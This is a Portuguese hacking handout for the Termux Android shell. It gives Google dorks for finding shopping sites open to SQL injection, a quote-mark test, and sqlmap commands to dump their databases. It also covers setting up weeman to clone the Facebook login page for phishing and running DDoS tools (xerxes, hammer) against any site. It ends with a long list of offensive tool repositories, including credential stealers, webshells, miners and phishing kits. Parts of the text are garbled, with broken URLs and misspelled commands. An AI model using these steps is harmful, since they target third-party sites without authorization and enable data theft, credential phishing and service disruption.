Primeiramente, Obrigado por usar a

apostila feita por Sr. Alto... Espero ajudar

a voces!

Vamos inciar o TERMUX!

Vamos alguns comandos basicos no

Termux!
cd home - Vai ao diretorio home.

ls - Lista Scripts e pastas em algum

diretorio.

ls -l -Ver as permissões do repositório.

ls - Lista Scripts e pastas em algum

diretorio.

ls -l -Ver as permissões do repositório.

cd .. - Retorna ao diretório anterior.

git clone - Baixa o script apartir do

repositorio do GitHub.

clear - Limpa a tela do console

termux-setup-storage - Aceita que o

Termux tenha acesso ao seu dispositivo.

Linguagens usadas no Termux...

Python
Python
Ruby
Bash
Comando principais...

Caso apareca [Y/N] Pressione a tecla Y

para confirmar (Yes)

apt update
apt upgrade
apt intall python
apt install python2
apt install ruby
apt install git
apt install nmap
apt install hydra
apt install nano
apt install clang
apt install curl
apt install coreutils
apt install perl
apt install wget
apt install libhtml-html5-entities-perl
apt install php
apt install tor
apt install aircrack-ng
apt install shc
apt install proot
COMO ACHAR SITES VULNERAVEIS?

Podemos usar as conhecidas dorks que

estarão nesse PDF em uma outra
página...

Escolhemos uma Dork e colocando no

google, achando uma lista de sites
escolha um e abra em seu navegador, vá
no site e depois do site no navegador
coloque uma aspas simples ( ' ).

exemplo

www.exemplosralto.com'

Vejamos em seguida se o site apresentar

um erro ele é vulnerável se ele recarregar
normalmente ele não é vulnerável!

DORKS PARA ACHAR SITES VULNERAVEIS

inurl:".php?catid=" intext:"Viewcart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/
BuyNow/"+site:.net inurl:".php?
cid="+intext:"online+betting"
inurl:".php?id="intext:"View cart"
inurl:".php?id="intext:"Buy Now"
inurl:".php?id="intext:"add to cart"
inurl:".php?id="intext:"shopping"
inurl:".php?id="intext:"boutique"
inurl:".php?id=" intext:"/
store/"
inurl:".php?id="intext:"/shop/"
inurl:".php?id="intext:"toys" inurl:".php?
cid="
inurl:".php?cid="intext:"shopping"

SQL MAP

apt install python2

apt install git
gitclone
http://github.com/sqlmapproject/sqlmap

cd sqlmap
python2 sqlmap.py

python2 sqlmap.py -u (Site) --dbs

python2 sqlmap.py -u (Site) --dbs (Nome

do banco de dados) -t (data) --columns

python2 sqlmap.py -u (Site) --dbs (Nome

do banco de dados) -t (data) -c (dados) --
dump

CLONE FACEBOOK OU PAGINAS FAKE

git clone
https://github.com/evait-security/weman
ls
cd weeman
ls
chmod 777 -r*
python2 weeman.py
set url http://www.facebook.com/login
set action_url
https://www.facebook.com/login set port
8080 run
DDOS/DOS

Ataque DDoS/DOS (XERXES)

git clone
https://github.com/zanyarjamal/xerxes
ls
cd xerxes
ls
clang xerxes.c -o xerxes
./xerxes (site sem http e www) 80

Ataque DDoS/DOS (HAMMER)

git clone
https://github.com/cyweb/hammer
cd hammer
python hammer.py
python hammer.py -s ip do site aqui -p 80
METASPLOIT-FRAMEWORK

apt install git

https://github.com/rapid7/metasploit
-framework

msfconsole – metasploit em modo

console

msfcli – interface de automatização de

penetração e exploração

msflogdump – exibe sessões de arquivos

de log

msfplayload – usado para gerar payloads

customizados

msfpescan – utilizado para analisar e

descompilar executáveis e DLLs

msfencode – um codificador interactivo

de payload encoder

msfupdate – utilizado para verificar e

fazer download de actualização do
framework

msfweb – Interface gráfica via browser

O Metasploit é um framework criado por

H.D.Moore, que serve para elaboração e
execução de um repositório de exploits.

D- TECT

git clone
https://github.com/shawarkhanethicalhacke
/D-TECT

cd D-TECT
ls
python2 d-tect.py

MUDAR COR NO TERMUX

https://github.com/Cabbagec/termux
-ohmyzsh
ALGUNS COMANDOS...

git clone
https://github.com/cyweb/hammer
cd hammer
python hammer.py
python hammer.py -s ip do site aqui -p 80 -
t 135

DDOS MARYEN SECURITY

git clone
https://github.com/maryensecurity
/maryen_ddos

SCAN PORTAS MARYEN SECURITY

git clone
https://github.com/maryensecurity/scan
_portas

SCAN PORTAS 2 MARYEN SECURITY

git clone
https://github.com/maryensecurity/scan
_portas2
BYPASS MARYEN SECURITY
git clone
https://github.com/maryensecurity
/cloudflare_bypass

ADMIN FINDER MARYEN SECURITY

git clone
https://github.com/maryensecurity/admin
-finder

SQL AUTO MARYEN SECURITY

git clone
https://github.com/maryensecurity/sql
_auto-termux

METASPLOIT MARYEN SECURITY

git clone
https://github.com/maryensecurity
/metasploit-install

GERADOR CPF MARYEN SECURITY

git clone
https://github.com/maryensecurity/gerador
-cpf
WEEMAN
git clone
https://github.com/evait-security/weeman
git clone

SQL MAP
https://github.com/sqlmapproject/sqlmap

RED HAWK
git clone
https://github.com/Tuhinshubhra/RED
_HAWK

RECONDOG
git clone
https://github.com/UltimateHackers
/ReconDog

THE FAT RAT

git clone
https://github.com/Screetsec/TheFatRat

GOLISMERO
git clone
https://github.com/golismero/golismero
 SECRETSQUIRREL
git clone
https://github.com/secretsquirrel
/SigThief.git

GIT MINER
git clone
https://github.com/UnkL4b/GitMiner.git

VIRUS TOTAL
git clone
https://github.com/VirusTotal/qt-virustotal
-uploader.git

DATAS PLOIT
git clone
https://github.com/DataSploit/datasploit
.git
git clone
https://github.com/mcarpenter/afl.git
git clone
https://github.com/Suspicious-Shell
-Activity/venom.git
git clone
https://github.com/SpiderLabs/Responder
.git
git clone
https://github.com/PowerShellMafia
/Saddam.git
git clone
https://github.com/botherder/virustotal
.git
git clone
https://github.com/Microsoft/binskim.git
git clone
https://github.com/0xd4d/dnSpy.git
git clone
https://github.com/lowleveldesign/wtrace
.git
git clone
https://github.com/spesmilo/electrum.git
git clone
https://github.com/bitcoin-wallet/bitcoin
-wallet.git
git clone
https://github.com/tuxotron/xvwa_lamp
_container.git
git clone
https://github.com/JonathanSalwan
/Triton.hit
git clone
https://github.com/hypsurus/weeman.git
git clone
https://github.com/krmaxwell/tinfoleak
git clone
https://github.com/secretsquirrel/fido.git
git clone
https://github.com/gentilkiwi/mimikatz
.git
git clone
https://github.com/SecurityInnovation
/AuthMatrix.git
git clone
https://github.com/akheron/jansson
git clone
https://github.com/wolf9466/cpuminer
-multi.git
git clone
https://github.com/tsiv/ccminer-cryptonight
.git
git clone
https://github.com/evilsocket/bettercap
-proxy-modules.git
git clone
https://github.com/Raikia/FiercePhish.git
git clone
https://github.com/adaptivethreat/Empire
.git
git clone
https://github.com/gophish/gophish.git
git clone
https://github.com/DhavalKapil/icmptunnel
.git
git clone
https://github.com/sqlmapproject
/sqlmap.git
git clone
https://github.com/davidpepper/fierce
-domain-scanner.git
git clone
https://github.com/Mebus/cupp.git
git clone
https://github.com/digininja/CeWL.git
git clone
https://github.com/iagox86/dnscat2.git
git clone
https://github.com/ryhanson/phishery.git
git clone
https://github.com/JusticeRage/Manalyze
.git
git clone
git://git.kali.org/packages/exploitdb.git
git clone
https://github.com/trustedsec/social
-engineer-toolkit.git
git clone
https://github.com/roobixx/cowpatty.git
git clone
https://github.com/hashcat/hashcat.git
git clone
https://github.com/laramies/theHarvester
.git
git clone
https://github.com/secretsquirrel/the
-backdoor-factory.git
git clone
https://github.com/EnableSecurity
/wafw00f.git
git clone
https://github.com/stephenfewer
/ReflectiveDLLInjection.git
git clone
https://github.com/kstaken/dockerfile
-examples.git
git clone
https://github.com/xmendez/wfuzz.git
git clone
https://github.com/pxb1988/dex2jar.git
git clone
git://git.kali.org/packages/dirbuster.git
git clone
https://github.com/deltaxflux/fluxion.git
git clone
git://git.kali.org/packages/joomscan.git
git clone
https://github.com/hexploitable/MEMSCAN
.git
git clone
https://github.com/hiddenillusion
/AnalyzePDF.git
git clone
https://github.com/smalot/pdfparser.git
git clone
https://github.com/jesparza/peepdf.git
git clone
https://github.com/reverse-shell/routersploi
.git
git clone
https://github.com/google/sandbox
-attacksurface-analysis-tools.git
git clone
https://github.com/sophron/wifiphisher
.git
git clone
https://github.com/wpscanteam/wpscan
.git
git clone
https://github.com/Yara-Rules/rules.git
git clone
git://github.com/cuckoosandbox/cuckoo
.git
git clone
https://github.com/juansacco/exploitpack
.git
git clone
https://github.com/BlackArch/webshells
.git
git clone
https://github.com/EgeBalci/HERCULES
.git
git clone
https://github.com/EgeBalci/Cminer.git
git clone
https://github.com/EgeBalci/The-Eye.git
git clone
https://github.com/DanMcInerney
/wifijammer.git